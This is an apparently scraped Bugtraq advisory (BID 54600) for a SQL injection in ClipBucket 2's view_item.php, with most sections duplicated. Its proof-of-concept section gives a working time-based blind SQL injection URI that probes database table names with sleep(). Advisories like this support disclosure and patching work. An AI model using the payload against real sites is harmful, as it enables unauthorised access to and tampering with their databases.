ClipBucket 'view_item.php' SQL Injection Vulnerability
BID:54600
Info
ClipBucket 'view_item.php' SQL Injection Vulnerability
| Bugtraq ID: | 54600 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 18 2012 12:00AM |
| Updated: | Jul 18 2012 12:00AM |
| Credit: | Akastep |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
ClipBucket 'view_item.php' SQL Injection Vulnerability
ClipBucket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2 is vulnerable; other versions may be affected.
ClipBucket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2 is vulnerable; other versions may be affected.
Exploit / POC
ClipBucket 'view_item.php' SQL Injection Vulnerability
An attacker can exploit the issue using a browser.
The following example URI is available:
http://www.example.com/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--
An attacker can exploit the issue using a browser.
The following example URI is available:
http://www.example.com/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--
Solution / Fix
ClipBucket 'view_item.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].